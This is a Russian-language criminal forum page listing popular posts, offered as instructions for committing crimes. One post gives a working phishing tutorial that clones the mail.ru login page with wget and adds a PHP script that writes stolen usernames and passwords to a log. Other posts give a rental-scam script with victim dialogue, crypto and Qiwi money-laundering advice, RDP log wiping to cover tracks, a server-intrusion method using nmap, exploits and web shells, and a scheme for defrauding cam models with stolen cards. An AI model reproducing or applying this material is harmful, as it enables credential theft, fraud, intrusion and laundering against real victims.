Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 13.12.2021 в Сообщения

  1. 1 балл
    Здравствуйте. Выкладываю свой собственный мануал по заработку. В мануале есть уже готовые поставщики и потенциальные клиенты. Думал продавать эту схему, но не стану. Выложу бесплатно. Это мой реальный опыт. Мой рекорд 3.300.000 за полгода с партнером. Считайте 300.000 в месяц. Не занимаюсь, потому что реинвестировал деньги в другое дело. Более прибыльное как мне кажется. Если не получится, то вернусь. Цвет - полностью белая Заработок - от 10.000 до 1.000.000 рублей за сделку и выше. В месяц реально делать 2-3 сделки. Тематика - B2B продажи. Можно использовать данный манул и по другим схожим товарам. Вложения - можно начинать нуля, только затраты на связь. В идеале иметь свой автомобиль и юридическое лицо. Временные затраты - минимум 3 часа в день. В идеале полная занятость. Первая прибыль - если делать все правильно, то в течении одного месяца. Конкуренция - конкуренция есть, но зарабатывать можно спокойно еще минимум несколько лет. Если голова на месте есть, то можно другие товары продавать, чтобы заработок был вечный. Уровень нужных знаний - можно начинать с нуля. В мануале все подробно расписал со всеми подробностями Под хайд ставить не буду. Все равно 99 процентов ничего не делать не будет, ибо оффлайн) Схема - https://yadi.sk/d/o7j6kkdW0yaJFA 2 файла docx формата и 2 файла xlsx формата
  2. 1 балл
    И в итоге просто пишете о том что инвест проект прогорел и они все потеряли свои вложения.
  3. 1 балл
    Привет я бы хотел узнать побольше об этом
  4. 1 балл
    Как все мы знаем, при подключении к удаленным компьютерам данные о ip адресах и логинах сохраняются. Эта новость может не совсем понравиться людям, следящим за своей анонимностью в сети, поэтому, решил выложить мануал по очистке логов с rdp соединений (не мой авторский) Для очистки нам понадобится редактор реестра regedit.exe 2. Открываем его и переходим в ветку: HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client Ниже видим две папки. Папка Default хранит историю о 10-ти последних подключениях RDP. Servers содержит список всех серверов и имен пользователей, которые раньше использовались для входа. 3. Открываем папку Deafult Здесь будут файлы с именем MRU от 0 до 9, в колонке Значение будет список ip адресов. Выделяем все эти файлы и удаляем (на скрине мои файлы уже удалены) 4. Теперь заходим в Servers Как мы видим, здесь есть и ip адрес, и имя пользователя под которым осуществлялся вход. 5. Нам нужно удалить все подпапки в Servers. Еще есть файл Default.rdp . Он содержит информацию о последнем подключении RDP. 6. Этот файл скрытый, находится в папке Documents. Удаляем его. 7. Проверяем Как видим, в наших логах пусто.
  5. 1 балл
    я слышал что забаратывать на шантаже не очень красиво
  6. 1 балл
    Если вы считаете себя топовым соц инженером или же обладаете подвешенным языком, то эта старая но, до сих пор рабочая схема для Вас. Подготовка: Если у вас прямые руки, то на подготовку уйдет не более 1 часа. 1) Документы. -САМОЕ ГЛАВНОЕ документы должны быть с городом и пропиской где вы будете размещать его( я брал МСК и прописку ближе к центру), тут нам нужно - главная страница, прописка, селфи с паспортом и желательно отдельно фото чела без всего. (могут запросить еще, и тут я наебался так-как взял только с доками, это была самая большая моя ошибка которая повлекла за собой 40% слива) 2)Симка. -Она должны быть на ЛЕВЫЕ данные. На нее будем регать киви, и месенджеры. 3)Киви. -Создаем киви кошелек, и создаем там виртуалку (АНОНИМНОСТЬ, при переводе не будут отображаться ФИО, если пристанут "че за хуйня где ваши фио, говорите - карта другого банка(сити, райф, альфа), в основном все переводят со сбера. Отправляете только номер карты, не нужно говорить "давайте на киви", это палево. 4) Авито. -Тут нам нужно найти хорошую квартиру, а точнее фото, желательно использовать "менее" популярные сайты объявлений, а точнее это нифига не известные сайты, те сайты которые вы даже от роду не знали(это нужно для того, чтобы объяву не блокнули сразу). После того как нашли фото(желательно от 5-7 фото), нам нужно разместить объяву( самый сложный и муторный процесс во всей схеме), авито те еще пидоры, можете получить блок даже не успев начать, и все считайте симка улетает в мусорку. Дабы этого избежать, нам нужно подогнать квартиру по стандартам, т.е. если вы нашли фото басятской хаты - в мусорку их, вам нужен среднечек, какие параметры юзал сам: общая площадь 53м.кв, площадь кухни 7-9м.кв., жилая 37м.кв., т.е вы должны понимать что ваши фото, ну хоть примерно должны подходить под параметры. -Что дальше: Адрес, тут я все объявы свои размещал под видом хрущевки (кто не знает это 5 этажка без лифта, панельная). Почему она? Да потому что жил сам в такой и знал квадратуру (квадратура нужна так-же для прохождения блокировки на авито). Далее нам нужно понять где размещать, тут нам в помощь: навигация, яд.карты, 2гис. Нужно пробить где стоят такие дома (мне было проще так как я знаю Москву), поэтому если вы живете в таких городах вам будет проще (т.к. если вы разместите по рандомному адресу и будете размещать 5-этажку, а там мать вашу 25-этажка - СРАЗУ БЛОК). Описание "не должно" бросаться в глаза, здесь двоякая история, оно не должно бросаться в глаза модерам, но должно бросаться в глаза вашему "мамонту". По поводу цены, давайте поясню, я размещал 2-х комнатную, такая квартира сдается в МСК не меньше 40т.руб (если это не бомжатник), и депозит стоит тоже 40, как думаете если вы поставите тоже самое, поток будет большим? Ни черта, а поток нам нужен, и причем такой чтобы пока вы разговариваете по телефону у вас на второй линии весело еще 5 мамонтов. Тут я не стал перегибать, разместил за 30 и деп выставил 15(ну и как вы думаете какой был поток? А я вам скажу, я за сутки размещения успел убить в ноль тапок( обычный 2-х симочный патифон ) да, он больше не включается, поток был такой, что я не понимал что происходит). Предупреждаю - первые 30-60 минут у вас будет разрываться телефон от агентов, но ни в коем случае не скидывайте с них, разговаривайте 2-3 минуты, и доносите что вам не нужны их услуги, могут спросить номер дома, этаж, наименование улицы, ОТВЕЧАЙТЕ НА ВСЕ ЭТО, у меня у самого есть подозрения что там есть с авито ребятки, которые вас пробивают, и если вы не можете ответить быстро и молниеносно то получите бан <МОМЕНТ РАЗВОДА> Друг ты ОБЯЗАН УМЕТЬ РАГОВАРИВАТЬ, если ты читал эту тему до этого момента и понял что ты разговаривать толком то и не умеешь, то извини, можешь попробовать , но не факт что у тебя и выйдет. Почему нужно уметь разговаривать? -Ты должен влиться в доверие к человеку, чтобы он проникся тобой и твоей ситуацией. Итак, вот мы разместили объявление, все подготовили, и понеслась жара, после того как из всех звонков остается 10% агентов можно начинать работать(хотя тут по желанию, сам делал так). <ПРИМЕР ПОСТРОЕНИЯ ДИАЛОГА> М-мамонт, МР-мамкин разводила. М:- Здравствуйте,....(чет там бормочет, обычно спрашивают сдали или нет) МР:-Здравствуйте, да еще сдается. М:-Когда можно посмотреть?(с такими придеться поебаться, обычно я ставил упор на таких "Хата огонь когда можно снять") МР:-Давайте я вам сейчас задам пару вопросов, вы для себя? животные? вредные привычки? М:- (тут он начинает заливать свою тру стори, главное вникайте и старайтесь запомнить, это понадобится вам для установления доверия). Когда можно посмотреть? МР:-(ВОТ ИМЕННО ТУТ И НАЧИНАЕТСЯ САМЫЙ ОТВЕТСТВЕННЫЙ МОМЕНТ) Смотрите (вставляю свой пример) сам уже давно проживаю не в МСК, добираться примерно 2-3 часа, живу в подмосковье, квартиру сдаю, т.к. там никто не живет, да и не собираемся там жить еще долгое время. М, скажите вы как настроены заехать уже? Вариант нравится? М:- Да брат хата норм хочу там девок по чирикать, чтобы думали что моя хата. МР:- М, смотрите мне просто перед вами звонил молодой человек, он готов уже завтра снять ее, но ваша кандидатура нравится больше (у них собака, они курят, они таджики.... ну короче додумывайте цепляйтесь за инфу которую он сказал раньше). М:- (он типа понимает вас). МР:- М, давайте я сейчас немного подумаю, как мне поступить и перезвоню вам?(МАКСИМУМ 5 МИНУТ, далее уже будет подозрительно, либо он найдет другой вариант для себя) МР:- Здравствуйте это (ваше имя в доках (левых) и на авито), по поводу квартиры с вами разговаривали, знаете я так подумал, как кандидат вы меня больше устраиваете, я тут подумал как мы можем с вами поступить, скажите в вотсапе сидите? М:- Да, конечно(ну по крайней мере у меня все сидели) МР:- Смотрите сейчас как закончим с вами говорить напишите мне на этот номер, вот и собственно как мы с вами поступим, у меня просто была ситуация когда я приехал на показ квартиры, а молодой человек не явился с которым договаривались, и я потратил в общей сумме 4-5 часов на дорогу, и я бы не хотел чтобы такое повторилось. Поэтому для своей гарантии я должен быть уверен что вы появитесь и я в пустую не потрачу свое время. М:-Начнет залупаться что типо,"да я, да вы что, чтобы я да и не приехал" в этом случае вам пофигу, ЕМУ НУЖНА ВАША КВАРТИРА И ВЫ ГНЕТЕ СВОЮ ЛИНИЮ. МР:-Я понимаю что вы приедете, но может случиться любая ситуация, и мне нужна гарантия и чтобы вы были спокойны я в вотсапе отправлю свои данные (собственно для чего и нужны фото нашего дропа) а вы мне отправите на мою карту символическую предоплату 1-3 тыс (тут нужно по челику понимать готов он отправить вам 3к, если чувствуете что он сомневается просите меньше), это не больше чем гарантия того, что вы будете на месте, это даст ответственности вам, и я буду спокоен если вы приедете, если квартира не понравится то этот залог я отдам вам на месте. Дальше у вас начинается переписка в вотсапе, там уже точно справитесь, главное говорить уверенно и не меньжеваться. Тема рабочая и проверенная лично мной, мой профит за сутки 7000, но могу сказать я сам виноват в этом, потому, что где-то оступался, тупил и не давил на мамонтов
  7. 1 балл
    Список некачественных VPN Hola В 2015 году выяснилось, что Hola использует часть ПК своих повествователей в качестве "выходных нод" для перенаправления своего трафика. И все бы ничего, но этот трафик Hola продавали третьей стороне. HotSpot Shield В 2017 группа исследователей заявила, что HotSpot Shield "мониторят и перенапраляют трафик на партнерские сайты, включая рекламные компании". Так же заявлялось, что HotSpot Shield логируют детали подключения, что противоречит их собственной политике приватности. Так же в 2016 году в исследовании было обнаружено, что сервис "внедряет JavaScript код" и "перенаправляет трафик на партнерские домены" HideMyAss В 2001 году ФБР отследили хакерскую активность с адреса, принадлежащего сервису HideMyAss. ФБР удалось добыть логи активности от представителей сервиса и успешно поймать хакера. Хакеры плохо, но хранить логи тоже не комильфо. Opera Free VPN Запомните - это не VPN, а Proxy. Поэтому разработчики прекрасно знают и хранят всю передаваемую информацию. PureVPN Снова история с ФБР и хакерами точнее сталкерами. Суть в том, что PureVPN обещают не сохранять логи, но почему-то ФБР они их показали и преступника поймали. ProtonVPN - сервис от известного почтовика ProtonMail. Казалось бы, тут должны относится к приватности со всей серьёзностью. На самом деле сейчас у Proton есть проблемы с утечкой IP, DNS, с подключением и... И они хранят логи подключения. VPNSecure Сервера находятся в Австралии, стране которая находится под покровом системы сбора данных Five Eyes. А еще здесь вас жду IP и DNS утечки. 5 лучших VPN-сервисов CactusVPN VPN-сервис из Молдовы, который вообще не ведет логи (по-крайней мере, так было в начале 2016 года) и принимает биткойн в качестве оплаты. Этот сервис позволяет защитить до 3 устройств одновременно, что довольно неплохо для, скажем, журналиста, которому нужно защитить и ноутбук, и телефон. У этого сервиса не так уж много серверов и серверных локаций, зато есть очень надежное 256-битное шифрование AES. Также в приложении этого сервиса реализована функция «apps Killer» — продвинутый вариант функции экстренного отключения от сети. CyberGhost Румынский VPN-сервис можно смело назвать самым прозрачным из всех: адрес офиса и контактные данные генерального директора компании вы найдете на их сайте без каких-либо проблем! Плюсом идет огромный список серверов и бесплатный тариф (правда, его возможности довольно-таки ограничены). ПО этого VPN-сервиса интуитивно понятное, нельзя не отметить и наличие функции экстренного отключения от сети – отдельный респект от нас за это. NordVPN VPN-сервис из Панамы, с которым мало кто может потягаться. Особенно выделяется NordVPN в плане безопасности: этот сервис предоставляет возможность установить как двойное VPN-подключение, так и подключение типа Tor-через-VPN. Кроме того, тарифы NordVPN вполне доступны (наличие скидок можно проверить тут). Ну а если вы — из тех, кому нужен и самый высокий уровень безопасности, и доступ к Netlflix, то NordVPN и здесь на шаг впереди со своим сервером Ultra Fast TV. Почти что бесконечно длинный список серверов и серверных локаций – другой плюс этого VPN-сервиса! Trust.Zone Сейшельские острова относятся к VPN-сервисам с очень большой благосклонностью. Отчасти именно по этой причине на островах зарегистрировано множеством VPN-сервисов, в том числе и Trust.Zone. Клиентская программа этого сервиса отлично определяет наиболее подходящий для пользователя сервер (причем автоматически), в ней также реализована функция экстренного отключения от сети. Единственный минус Trust.Zone заключается в том, что у этой клиентской программы есть версия только для компьютеров под управлением Windows. VPNTunnel Также зарегистрированный на Сейшельских островах, VPN-сервис VPNTunnel является хорошим вариантом для каждого, кто хочет остаться анонимным. Для начала работы нужно указать лишь почтовый адрес, при этом сервис не записывает и не хранит личные данные пользователей. Также VPNTunnel отлично показывает себя в тех случаях, когда пользователи хотят получить доступ к популярных американским и британским сайтам (например, к Pandora, Hulu, Netflix или BBC iPlayer). Впрочем, стоит отметить, что качество работы службы пользовательской поддержки этого сервиса является довольно спорным.
  8. 1 балл
    -Привет! А воровство битка преследуется законом?) -Да. Назначается оценочная экспертиза и по оф курсу определяют ценность похищенного. -И реально найти похитителя? -Очень тяжело. -Если общение было через телеграмм? -Очень-очень тяжело! -Допустим гарант украл n-ую сумму, а потом отмыл... -95% оперов не шарят, что такое крипта. Отдел К в счет не берем, так как к ним такие материалы попадают крайне редко. Если на серьезную сумму опрокинули, лучше обращаться сразу в управление, а не в отдел. -Ну да, нынче можно прийти а тебя не поймут и не поймут что у тебя спиздили, обычные мусора. Киберполиция еще да. -Её нет как таковой. Есть отдел К (больше вспомогательная функция), отделы по борьбе «с высокими» в уэбе и отделы по борьбе с мошенничествами в обычных отделах или управах (в составе угрозыска). -Можешь еще объяснить? С одной стороны слышу, что биткойн анонимен, а с другой - что транзакции все видно. -Сами кошельки не привязаны к определенной личности. Вопрос только в том, откуда ты к ним подкчаешься. А транзы все видно, это изначальный принцип системы битка. Вообще лишь 2-3% сотрудников полиции шарят в этой теме и знают как использовать публичные данные по транзам. -Ну, допустим, я хочу отмыть деньги через биткойн. Безопасно ли это? Как лучше провернуть аферу? -Биток->монеро->биток->кэш через обменник на дроп карту. Это если ты украл 10 миллионов у одного лица, либо по 300 тр у пятнадцати человек в одном городе. А если 100-200-300 тысяч, не переживай. Врубай американский впн и мой через новосозданный биток. Можешь перегнать через кошелек на американской бирже (poloniex, binance, bittrex). Америка не отвечает нашим ментам даже через интерпол. А если отвечает, очень редко и очень долго. -А если на киви, а потом на дропкарту только? Без разницы? Можно так? -Киви с потрохами выдаст все данные) Будут дальше копать где снял деньги. Обязательно придут в гости к дропу. Изымут записи с банкомата, с которого налились деньги - это часть доказухи. В основном изымают за последний месяц-два, больше не хранятся записи. По биллингу возле банкомата будут бить если ты пизданул от 750тр. В каждом регионе суды решают по-разному. -Короче налить лучше не крупными суммами, в разных банкоматах и с закрытым ебалом. Подальше от дома. А лучше если бабки отлежатся на битке месяц два и потом только налить. Так? -В одном банкомате. В разных наследишь больше) Не обяз подальше от дома, ты главное мобильник не бери с собой и не выключай оставив его дома. Лучше сразу! Отлежаться они месяц, выведешь ты их на сбер. В итоге через два месяца с 5% вероятностью менты выйдут на сберкарту и пойдут изымать свежие видеозаписи. Плюс все видеозаписи по пути от банкомата к твоему дому. Они хранятся от 3 дней до месяца у частников. Считай, отлежав битки дашь свежий след ментам. -Думал чем дольше лежат, тем больше менты хуй забивают. -Например снял ты в конечном счете бабки в мухосранске, терпила в Москве. Как только выявят факт снятия, преступоение будет считаться оконченным в Мухосранске и материал отправят туда. -Понял, спасибо за информацию) ——— Таким образом, товарищи, мы знаем как лучше отмыть битки и киви
  9. 1 балл
    Чаще всего кибер-преступников ловят не иначе как по экономическим следам, вспомните любые новости за последний год: «Финансовая цепочка ведет в Россию», «Деньги с криптомайнера были обналичены в Северной Корее» и тп А эта статья очень сильно может помочь
  10. 1 балл
  11. 1 балл
    Сегодня решил поделиться информацией как можно получить права на любом сервере. Бытует мнение, что взлом это творческий процесс и привязывать его к каким либо алгоритмам не следует. Но на самом деле то не совсем так. Общий порядок действий все таки есть. И я постараюсь рассказать о нем. Так же я буду приводить ссылки по теме. Итак, у нас есть удаленный сервер и адрес сайта который хоститься на этом сервере. Задача — получить права рут на сервере. Для начала нам нужно получить хоть какие нибудь права на удаленном сервере. Т.е. нам нужно получить доступ к выполнению команд. Можно идти по 2 путям. 1 — Рассматривать сайты которые хостятся на сервере и пытаться залить Shell. 2 — Напрямую сканировать сервер и пытаться найти уязвимости у сервисах которые запущены на нем. Так же можно использовать СИ, но это не входит в рамки данной статьи. Пожалуй начнем по порядку. Атака на скрипты сайта. Итак, нам нужно залить шелл на через уязвимость в скриптах сайта. Здесь тоже можно поступать по-разному — либо самостоятельно искать уязвимости на сайте, либо определить название и версию скриптов, отправиться на багтрак и там поискать информацию о дырах в данных скриптах. Второй случай, думаю понятен. Например, вы приходите на сайт и видите в низу надпись WordPress XX.XX где ХХ.ХХ — версия движка. После вы идете например на www.securitylab.ru или на www.milw0rm.com там ищете сплоиты или информацию по уязвимостях в данной версии. Использую эту информацию или сплоиты вы сможете залить шелл на сервер тем самым, получив права на выполнение команд. На самом деле багтраков море, достаточно только поискать. Теперь разберем второй случай — под данную версию движка вы не смогли найти ничего. Теперь придется рассчитывать только на себя. Сначала нужно вручную проверить параметры сайта на фильтрацию т.е. проверить сайт на такие уязвимости, как PHP include, SQL inlection, XSS. С помощью первых двух вы сможете залить шелл, а с помощью XSS сможете украсть куки админа. Что бы не размусоливать эту тему предлагаю вам ознакомиться с ниже приведенными ссылками: SQL injection — ----------------------------------------------------------------------- ru.wikipedia.org/wiki/%D0%92%D0%BD%D0%B5%D0%B4%D1%80%D0%B5%D0%BD%D0%B8%D0%B5_SQL-%D0%BA%D0%BE%D0%B4%D0%B0 www.securitylab.ru/contest/212099.php www.xakep.ru/post/19146/default.asp www.whatis.ru/razn/razn13.shtml ------------------------------------------------------------------------ PHP include ----------------------------------------------------------------------- www.izcity.com/data/security/article1001.htm ----------------------------------------------------------------------- XSS ----------------------------------------------------------------------- ru.wikipedia.org/wiki/%D0%9C%D0%B5%D0%B6%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D0%B2%D1%8B%D0%B9_%D1%81%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%B8%D0%BD%D0%B3 www.hackzona.ru/hz.php?name=News&file=article&sid=5005&mode=&order=0&thold=0 ----------------------------------------------------------------------- Кроме того, можно скачать себе исходные коды скриптов сайта (если они публичные) и разобрать его по косточкам на известные ошибки. ----------------------------------------------------------------------- www.xakep.ru/post/43786/default.asp www.dreamcheats.ru/t3779.html forum.antichat.ru/showthread.php?t=49184 ----------------------------------------------------------------------- Вобще есть много хитростей при атаке на веб-сайт, советую поискать побольше информации в поисковике. Предположим у тебя получилось залить шелл, ты можешь выполнять команды. На этом пока остановимся и разберем, как еще можно получить такой доступ. Сканирование и использование эксплоитов. Сервер может выполнять разные функции — например, транспорт файлов (FTP) или отправка и прием почты (POP3, SMPT) и так далее. Что бы выполнять эти функции нужный специальные программы — сервисы, которые будут висеть на портах выполнять свои функции. Например, на сервере открыт 21 порт — этот порт использует протокол FTP. Раз порт открыт значит висит какой то сервис. Например, sendmail. Для определения открытых портов мы и будет сканировать сервер. Советую взять сканнер nmap. $nmap www.site.com Здесь мы в параметре передали адрес сайта, который присутствует на сервере (хостится). Предположим, что сканер показал нам, что на сервере открыт 21 порт. На самом деле отрытых портов будет много, но для примера возьмем этот. Теперь нам нужно узнать имя и версию сервиса который тут висит. Для этого можно использовать telnet: $telnet www.site.com 21 в ответ сервер выдаст нам приветствие и скорее всего имя и версию сервиса. Сразу же можно определить ОС: $nmap www.site.com -O Замечу, что для выполнения этой команды вы должны быть под root. Всю собранную информацию нужно записать куда-нибудь. Теперь можно найти удаленный эксплоит для данной версии FTP демона. Но не стоит тут же искать сплоиты, возомжно проникнуть в систему можно и без них. Например, в sendmail есть дыра, через которую можно отправить себе файл с паролями. Достаточно поискать в гугле уязвимости для данной версии. Не стоит так же забывать про ядро системы (версию мы узнали при сканировании) Ну предположим, что ничего не проктило, теперь череда сплоитов. Возможно, тебе повезет, и ты сразу найдешь эксплоит под данную версию демона. Если так, то его нужно скомпилировать: $gcc -o spoit /home/stranger/sploit.c Но скорее всего будет куча ошибок, которые придется исправлять. Для этого нужно знать С++. Если сплоит распространен в сети, то ты возможно сможешь найти уже скомилированую версию, но как правило удаленных эксплоитов не так много. Если удалось скомпилировать, то смело запускай. Не забудь, что ему нужно передать параметры. Обычно эксплоит сам говорит, что нужно вписать. Вот нескольо ссылок про них: -------------------------------------------------------------- damagelab.org/index.php?showtopic=7538 www.winzone.ru/articles/286/ ------------------------------------------------------------- В лучшем случае ты получишь права юзера, от которого был запущен данный демон. Повышения привилегий. Итак ты имеешь права, возможно, что ты уже под рутом (смотря каким способом ты проникал в систему). Для того что бы узнать свои права введи $id uid=xxx(**********) gid=xxx(********) Если xxx равны 0, то вы под рутом, в противном случае нужно еще попотеть. Итак нужно поднять права так чтобы uid=0 gid=0, стоит опять вспомнить про эксплоиты — для начала изучи доступные дириктории, возможно ты найдешь в них какие либо приложения, для этих приложений нужно найти сплоит и залить на сервер, ну и запустить впоследстии, где искать ты знаешь. На самом деле есть много способов как подняться. Но ведь это всего лишь алгоритм. Да и взлом — это творческий процесс. Подробнее могу объяснить в лс
  12. 1 балл
  13. 1 балл
    как выйти на связь с гарантом ?
  14. 1 балл
    Покупал схему не давно , выхлопы имеются дикие, актуальна будет еще долго по моему мнению
  15. 1 балл
  16. 1 балл
  17. 1 балл
    Фишинг - один из самых простых способов заполучить персональные данные пользователя. Суть метода заключается в том, чтобы, направив жертву на фэйковый сайт, который один в один похож на настоящий, и заставить её ввести туда свои персональные данные. Технически процесс можно разделить на два этапа: Подготовка копии сайта Нахождение способа заставить жертву перейти на фэйковый сайт. Отойдем немного к теории, фишинг это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей и чтоб они перешли на ваш фэйковый сайт и ввели свои данные. Социальная инжерения. Сейчас я расскажу поверхностно насчет фишинга. Создание клона сайта: Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы такие как картинки, аудиофайлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, но надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого надо изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там. Для примера попробуем создать реплику сайта страници авторизации mail. Её адрес https://account.mail.ru/login Чтобы просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в linux есть более простое решение. в консоли вводим команду wget --page-requisites --convert-links https://account.mail.ru/login После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидем то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальным сервере будет практически таким же. Для начала надо убедиться, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/ Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами source /etc/apache2/envvars systemctl restart apache2 После того как приветственная страница отобразилась нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login. Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action="https://auth.mail.ru/cgi-bin/auth" Меняем найденный текст на action="auth.php" Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда <?php file_put_contents('log/login_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND); ?> file_put_contents функция для записи данных в файл, log/login_log.txt - путь к файлу. $_POST['Username'] - имя пользователя из формы, а $_POST['Password'] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец. Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal. В появившимся окне вводим mkdir log chmod 777 log Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправим её на сайт mail с ошибкой входа. Для этого в auth.php перед ?> добавим строку и впишем туда. header('Location: https://account.mail.ru/login?fail=1'); Всё готово. Пробуем теперь зайти на http://127.0.0.1/login и ввести туда логин и пароль. Нас перенаправит на реальный сайт mail с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/login_log.txt
  18. 1 балл
  19. 1 балл
    сегодня есть свободные суммы в районе 3-4к ? есть пару дропов на которых можно все оформить. П.с. почисти личку.
  20. 1 балл
  21. 1 балл
    Спасибо! конфликт улажен) Думал что сперва кинули Но эти ребята не такие)
  22. 1 балл
    Слит недавно, еще тепленький! Слил как было, моего тут ни чего нет!!! ЧТО ВЫ ПОЛУЧИТЕ БЛАГОДАРЯ КУРСУ? Научитесь делать мобильные приложения и зарабатывать на них Получите доступ к нашей приватной партнерке и всем инструментам Узнаете о методах качественной монетизации, альтернативах и попробуете сами Получите готовые и протестированные решения по сливу трафика на CPI и СРА Узнаете о подготовке приложений, анализе ключевиков и оптимизации и ASO Узнаете о различных вариациях продвижения мобильных приложений, когда и где это необходимо Специальные бонусы от партнеров проекта и участников Мастер группы Стабильный пассивный доход и команду, на которую всегда можно положиться Качаем: https://yadi.sk/d/QBZeoZDtizf6x
  23. 1 балл
  24. 1 балл
    Насколько важно входить в енрол с одного ip? Можно делать так, чтобы город был один, а зипы разные (в случае накидывания носков)?Я так полагаю ни один дедик не проживет тех же 30 дней.
  25. 1 балл
    Если поставить левый wif+впн+дедик+сокс....думаю очень даже чисто полчается
  26. 1 балл
    Благодарю за полезную информацию)))
  27. 1 балл
    Ищу работу! UA, центр.
  28. 1 балл
    А может сами фсб решили подзаработать)),на них даже не подумают)
  29. 1 балл
    Давно отказался от него,да и вообще умные человек один мне посоветовал,вообще на дело свою личную трубу не бери,а то он тоже сигнал дает)
  30. 1 балл
    Мне кажется уже не осталось таких лохов) Но пробнуть можно)
  31. 1 балл
    . Билинг=шипинг,не проверяет картон по билинг адресу.думаю доступно объяснил
  32. 1 балл
    Хорошо) Остались контакты в джабе, так что жди скоро все будет как прежде!
  33. 1 балл
  34. 1 балл
    В Пскове силами полиции обезврежены два скимминг-мошенника В очередной раз банкоматы Сбербанка стали жертвой нападения скиммеров. Теперь это происшествие, носящее криминальный характер случилось в городе Псков. Благодаря оперативным действиям сотрудников местной полиции преступники были обезврежены на месте совершения преступления. В заявление пресс-центра Сбербанка, на этот раз злоумышленники были взяты с поличным тогда, когда попытались демонтировать скимминговое приспособление, установленное на банкомате заранее. Информация, полученная от видеокамер системы безопасности, сыграла большую роль в задержании преступников, и обеспечила своевременное прибытие сотрудников правоохранительных органов. Доказательствами преступной деятельности послужили также изъятая во время обыска у задержанных правонарушителей специализированная техника и другие устройства, которые применяются для кражи персональной информации. Сообщники злоумышленников были также выявлены и обезврежены по горячим следам. Дело уже передано в судебные органы, всем участникам преступного сообщества инкриминируется статья «Покушение на кражу». Санкции этой статьи предусматривают лишение свободы на срок от 5 до 10 лет. Источник
  35. 1 балл
    Срочно нужен скиммер ncr round square, оплата через гаранта.
  36. 1 балл
    Да, несомненно вы правы, что в нашей стране квартирный вопрос еще долго будет не решен. Но в некоторых случаях есть же и другие варианты. К примеру, квартира поменьше, в другом районе города и тд + к этому есть вариант вернуть подоходный налог с зарплаты(это ещё 260 тыс в конечном итоге).
  37. 1 балл
    GUDINA НЕА.. . Сертификат лишь подтверждает по сути, что некие испытания были проведены и ОПЛАЧЕНЫ... Конечно если что, можно инициировать расследование, но кто это будет делать?
  38. 1 балл
    Кстати, в больших городах вопрос решить, все же, проще. А если человек из области километров так за 100-150, а в Сибири и того дальше? Нужно ехать в областной город. Если крупногабаритный товар на гарантии, то могут и сами мастера приехать, а вот если гарантия кончилась?
  39. 1 балл
    лоха обывателя, а особенно девочку развести как нефиг)) попробуйте как нить инвесторов раскрутить
  40. 1 балл
    Доброго времени суток,ув.мемберы данного борда! В данный момент попытаюсь написать статью на тему датинга,вернее как добыть фото,видео и постоянную поддержку. Итак приступим: Завербовать девушку для этого дела,особого труда не составит,главное знать правильный подход и немного СИ. Искать таких девушек мы будет на известных порно сайтах как cams.com/livejasmin и т.д. И так заходим на cams.com,регистрируемся,подтверждаем аккаунт и вперед. Первое что нам нужно будет сделать,так это закинуть деньжат на акк,чтобы можно было пообщаться в привате с моделью один на один. Думаю нам это труда не составит,вбивы в такие порники проходят на ура. Далее просим её что нибудь показать интерестное,к примеру тот же стриптиз,говорим ей что она супер и ты был бы рад заходить и смотреть на неё каждый день,вообщем навешать лапши на уши ей,после этого красиво спросить её номер телефона/скайп/фейсбук,вообщем её контакты для связи,написать в чате они не могут,но на листочке бумаги они с радостью напишут,ибо они думают что ура богатый клиент,будут деньги,далее мы с ней связываемся и начинаем общаться уже в живую,тебя будет спрашивать в основном зайдешь ты посмотреть на неё сегодня или нет,после дружеского общения просим её выслать фото, (Я вообще научил пользоваться теамвивером и сам всё скачал с компа что мне нужно) такие девушки высылают без проблем. Ну что же фото мы получили,теперь нужно видео? - Видео получить особого труда не составит,можно даже попросить её станцевать стриптиз на видео и скинуть тебе,либо попросить по скайпу чтобы станцевала,а ты это снимешь. Если не захочет снять видео,ставим ей ультиматум,только по ласковей,пример: Дорогая,я сейчас на работе,не могу зайти к тебе на сайт и смотреть на тебя,мне очень не хочется чтобы ты показывала свои прелести всяким козлам,будь добра скинь мне видео где ты танцуешь танго чтобы я не скучал,а то всё время думаю о тебе. И так фото и видео у нас есть. Как осуществить её поддержку? - Тут всё предельно просто,когда нам нужна какая либо от неё инфа,мы просто звоним ей в скайп,спрашиваем её ник на cams,говорим что винда полетела и все данные пропали,и делаем карж акк и опять сливаем ей в приват лаве,ну а дальше девочка всё больше и больше рада с вами общаться,так как вы её прибыль. Вообщем как-то так. Незнаю познавательно или нет,но всё же.
  41. 1 балл
    R-studio попробуй, мне в свое время хорошо помогла
  42. 1 балл
